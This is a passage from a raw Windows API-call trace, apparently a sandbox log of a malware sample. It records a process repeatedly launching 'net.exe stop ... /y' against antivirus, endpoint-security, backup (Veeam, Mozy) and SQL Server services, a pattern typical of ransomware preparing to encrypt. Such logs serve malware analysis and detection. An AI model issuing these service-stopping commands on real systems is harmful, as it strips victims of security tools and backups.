HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeb0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x22749b0 | out: lpCommandLine="\"net.exe\" stop ekrn /y", lpProcessInformation=0x22749b0*(hProcess=0x43c, hThread=0x40c, dwProcessId=0xd3c, dwThreadId=0xd40)) returned 1 [0092.557] CloseHandle (hObject=0x448) returned 1 [0092.557] GetFileType (hFile=0x440) returned 0x3 [0092.557] CloseHandle (hObject=0x40c) returned 1 [0093.974] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0093.975] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x3c8, hWritePipe=0x5a6ef64*=0x448) returned 1 [0093.975] GetCurrentProcess () returned 0xffffffff [0093.975] GetCurrentProcess () returned 0xffffffff [0093.975] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x40c) returned 1 [0093.975] CloseHandle (hObject=0x3c8) returned 1 [0093.975] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0093.975] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0093.975] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0093.975] CoTaskMemFree (pv=0x741d20) [0093.975] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop mozyprobackup /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeb0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x249c0e8 | out: lpCommandLine="\"net.exe\" stop mozyprobackup /y", lpProcessInformation=0x249c0e8*(hProcess=0x3bc, hThread=0x3c8, dwProcessId=0xdac, dwThreadId=0xdb0)) returned 1 [0094.627] CloseHandle (hObject=0x448) returned 1 [0094.628] GetFileType (hFile=0x40c) returned 0x3 [0094.628] CloseHandle (hObject=0x3c8) returned 1 [0095.536] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0095.536] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x3c8, hWritePipe=0x5a6ef64*=0x448) returned 1 [0095.536] GetCurrentProcess () returned 0xffffffff [0095.536] GetCurrentProcess () returned 0xffffffff [0095.536] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x3cc) returned 1 [0095.537] CloseHandle (hObject=0x3c8) returned 1 [0095.537] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0095.537] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0095.537] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0095.537] CoTaskMemFree (pv=0x741d20) [0095.537] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop EPSecurityService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eea8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x24a7030 | out: lpCommandLine="\"net.exe\" stop EPSecurityService /y", lpProcessInformation=0x24a7030*(hProcess=0x388, hThread=0x3c8, dwProcessId=0xe30, dwThreadId=0xe34)) returned 1 [0095.543] CloseHandle (hObject=0x448) returned 1 [0095.543] GetFileType (hFile=0x3cc) returned 0x3 [0095.543] CloseHandle (hObject=0x3c8) returned 1 [0095.784] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0095.784] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x3c8, hWritePipe=0x5a6ef64*=0x448) returned 1 [0095.784] GetCurrentProcess () returned 0xffffffff [0095.784] GetCurrentProcess () returned 0xffffffff [0095.784] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x2c4) returned 1 [0095.784] CloseHandle (hObject=0x3c8) returned 1 [0095.784] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0095.785] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0095.785] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0095.785] CoTaskMemFree (pv=0x741d20) [0095.785] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSSQL$VEEAMSQL2008R2 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eea4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x24b55b8 | out: lpCommandLine="\"net.exe\" stop MSSQL$VEEAMSQL2008R2 /y", lpProcessInformation=0x24b55b8*(hProcess=0x338, hThread=0x3c8, dwProcessId=0xe6c, dwThreadId=0xe70)) returned 1 [0096.034] CloseHandle (hObject=0x448) returned 1 [0096.034] GetFileType (hFile=0x2c4) returned 0x3 [0096.034] CloseHandle (hObject=0x3c8) returned 1 [0098.016] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0098.016] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x448, hWritePipe=0x5a6ef64*=0x3f8) returned 1 [0098.016] GetCurrentProcess () returned 0xffffffff [0098.016] GetCurrentProcess () returned 0xffffffff [0098.016] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x3f0) returned 1 [0098.016] CloseHandle (hObject=0x448) returned 1 [0098.016] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0098.016] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0098.016] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0098.016] CoTaskMemFree (pv=0x741d20) [0098.016] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSSQL$TPS /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeb0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3f8, hStdError=0x0), lpProcessInformation=0x227a95c | out: lpCommandLine="\"net.exe\" stop MSSQL$TPS /y", lpProcessInformation=0x227a95c*(hProcess=0x394, hThread=0x448, dwProcessId=0xeec, dwThreadId=0xef0)) returned 1 [0098.635] CloseHandle (hObject=0x3f8) returned 1 [0098.636] GetFileType (hFile=0x3f0) returned 0x3 [0098.636] CloseHandle (hObject=0x448) returned 1 [0099.931] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0099.931] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x448, hWritePipe=0x5a6ef64*=0x3f8) returned 1 [0099.931] GetCurrentProcess () returned 0xffffffff [0099.931] GetCurrentProcess () returned 0xffffffff [0099.931] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x3f4) returned 1 [0099.932] CloseHandle (hObject=0x448) returned 1 [0099.932] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0099.932] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0099.932] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0099.932] CoTaskMemFree (pv=0x741d20) [0099.932] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop EPUpdateService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeac*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3f8, hStdError=0x0), lpProcessInformation=0x2477860 | out: lpCommandLine="\"net.exe\" stop EPUpdateService /y", lpProcessInformation=0x2477860*(hProcess=0x3d4, hThread=0x38c, dwProcessId=0xf48, dwThreadId=0xf4c)) returned 1 [0100.342] CloseHandle (hObject=0x3f8) returned 1 [0100.342] GetFileType (hFile=0x3f4) returned 0x3 [0100.342] CloseHandle (hObject=0x38c) returned 1 [0101.087] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0101.087] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x38c, hWritePipe=0x5a6ef64*=0x3f8) returned 1 [0101.087] GetCurrentProcess () returned 0xffffffff [0101.087] GetCurrentProcess () returned 0xffffffff [0101.087] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x38c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x458) returned 1 [0101.087] CloseHandle (hObject=0x38c) returned 1 [0101.088] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0101.088] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0101.088] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0101.088] CoTaskMemFree (pv=0x741d20) [0101.088] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop ntrtscan /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeb0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3f8, hStdError=0x0), lpProcessInformation=0x2485b7c | out: lpCommandLine="\"net.exe\" stop ntrtscan /y", lpProcessInformation=0x2485b7c*(hProcess=0x454, hThread=0x38c, dwProcessId=0xba8, dwThreadId=0xb48)) returned 1 [0101.128] CloseHandle (hObject=0x3f8) returned 1 [0101.128] GetFileType (hFile=0x458) returned 0x3 [0101.128] CloseHandle (hObject=0x38c) returned 1 [0103.142] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0103.142] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x3f8, hWritePipe=0x5a6ef64*=0x470) returned 1 [0103.142] GetCurrentProcess () returned 0xffffffff [0103.142] GetCurrentProcess () returned 0xffffffff [0103.142] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x3cc) returned 1 [0103.142] CloseHandle (hObject=0x3f8) returned 1 [0103.143] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0103.143] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0103.143] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0103.143] CoTaskMemFree (pv=0x741d20) [0103.143] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSSQL$TPSAMA /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeb0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x470, hStdError=0x0), lpProcessInformation=0x227147c | out: lpCommandLine="\"net.exe\" stop MSSQL$TPSAMA /y", lpProcessInformation=0x227147c*(hProcess=0x41c, hThread=0x3f8, dwProcessId=0x628, dwThreadId=0x73c)) returned 1 [0103.149] CloseHandle (hObject=0x470) returned 1 [0103.149] GetFileType (hFile=0x3cc) returned 0x3 [0103.150] CloseHandle (hObject=0x3f8) returned 1 [0104.164] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0104.164] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x470, hWritePipe=0x5a6ef64*=0x448) returned 1 [0104.164] GetCurrentProcess () returned 0xffffffff [0104.164] GetCurrentProcess () returned 0xffffffff [0104.164] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x470, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x41c) returned 1 [0104.164] CloseHandle (hObject=0x470) returned 1 [0104.164] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0104.165] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0104.165] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0104.165] CoTaskMemFree (pv=0x741d20) [0104.165] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop EsgShKernel /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeb0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x2277c68 | out: lpCommandLine="\"net.exe\" stop EsgShKernel /y", lpProcessInformation=0x2277c68*(hProcess=0x3cc, hThread=0x3b4, dwProcessId=0xb7c, dwThreadId=0xd60)) returned 1 [0105.267] CloseHandle (hObject=0x448) returned 1 [0105.267] GetFileType (hFile=0x41c) returned 0x3 [0105.268] CloseHandle (hObject=0x3b4) returned 1 [0105.635] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0105.635] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x3b4, hWritePipe=0x5a6ef64*=0x448) returned 1 [0105.636] GetCurrentProcess () returned 0xffffffff [0105.636] GetCurrentProcess () returned 0xffffffff [0105.636] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x2c4) returned 1 [0105.636] CloseHandle (hObject=0x3b4) returned 1 [0105.636] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0105.636] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0105.636] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0105.636] CoTaskMemFree (pv=0x741d20) [0105.636] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop PDVFSService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeb0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x23f0814 | out: lpCommandLine="\"net.exe\" stop PDVFSService /y", lpProcessInformation=0x23f0814*(hProcess=0x3f0, hThread=0x3b4, dwProcessId=0x8d4, dwThreadId=0xf5c)) returned 1 [0105.645] CloseHandle (hObject=0x448) returned 1 [0105.645] GetFileType (hFile=0x2c4) returned 0x3 [0105.645] CloseHandle (hObject=0x3b4) returned 1 [0105.646] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0105.646] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x3b4, hWritePipe=0x5a6ef64*=0x448) returned 1 [0105.646] GetCurrentProcess () returned 0xffffffff [0105.646] GetCurrentProcess () returned 0xffffffff [0105.646] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x3f4) returned 1 [0105.646] CloseHandle (hObject=0x3b4) returned 1 [0105.646] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0105.646] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0105.646] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0105.647] CoTaskMemFree (pv=0x741d20) [0105.647] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSSQLServerADHelper /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eea4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x24026ac | out: lpCommandLine="\"net.exe\" stop MSSQLServerADHelper /y", lpProcessInformation=0x24026ac*(hProcess=0x3d4, hThread=0x3b4, dwProcessId=0xf34, dwThreadId=0xf70)) returned 1 [0105.655] CloseHandle (hObject=0x448) returned 1 [0105.655] GetFileType (hFile=0x3f4) returned 0x3 [0105.655] CloseHandle (hObject=0x3b4) returned 1 [0105.655] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0105.656] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x3b4, hWritePipe=0x5a6ef64*=0x448) returned 1 [0105.656] GetCurrentProcess () returned 0xffffffff [0105.656] GetCurrentProcess () returned 0xffffffff [0105.656] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x414) returned 1 [0105.656] CloseHandle (hObject=0x3b4) returned 1 [0105.656] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0105.656] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0105.656] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0105.656] CoTaskMemFree (pv=0x741d20) [0105.656] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop McAfeeEngineService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eea4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x2405f74 | out: lpCommandLine="\"net.exe\" stop McAfeeEngineService /y", lpProcessInformation=0x2405f74*(hProcess=0x434, hThread=0x3b4, dwProcessId=0x38c, dwThreadId=0x3f8)) returned 1 [0105.666] CloseHandle (hObject=0x448) returned 1 [0105.666] GetFileType (hFile=0x414) returned 0x3 [0105.666] CloseHandle (hObject=0x3b4) returned 1 [0105.666] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0105.666] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x3b4, hWritePipe=0x5a6ef64*=0x448) returned 1 [0105.666] GetCurrentProcess () returned 0xffffffff [0105.666] GetCurrentProcess () returned 0xffffffff [0105.666] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x2f4) returned 1 [0105.666] CloseHandle (hObject=0x3b4) returned 1 [0105.666] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0105.666] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0105.666] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0105.666] CoTaskMemFree (pv=0x741d20) [0105.667] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop VeeamHvIntegrationSvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eea0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x2409840 | out: lpCommandLine="\"net.exe\" stop VeeamHvIntegrationSvc /y", lpProcessInformation=0x2409840*(hProcess=0x3b8, hThread=0x3b4, dwProcessId=0x8c4, dwThreadId=0xa04)) returned 1 [0105.674] CloseHandle (hObject=0x448) returned 1 [0105.674] GetFileType (hFile=0x2f4) returned 0x3 [0105.674] CloseHandle (hObject=0x3b4) returned 1 [0105.674] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0105.674] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x3b4, hWritePipe=0x5a6ef64*=0x448) returned 1 [0105.674] GetCurrentProcess () returned 0xffffffff [0105.674] GetCurrentProcess () returned 0xffffffff [0105.675] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x418) returned 1 [0105.675] CloseHandle (hObject=0x3b4) returned 1 [0105.675] GetStdHandle 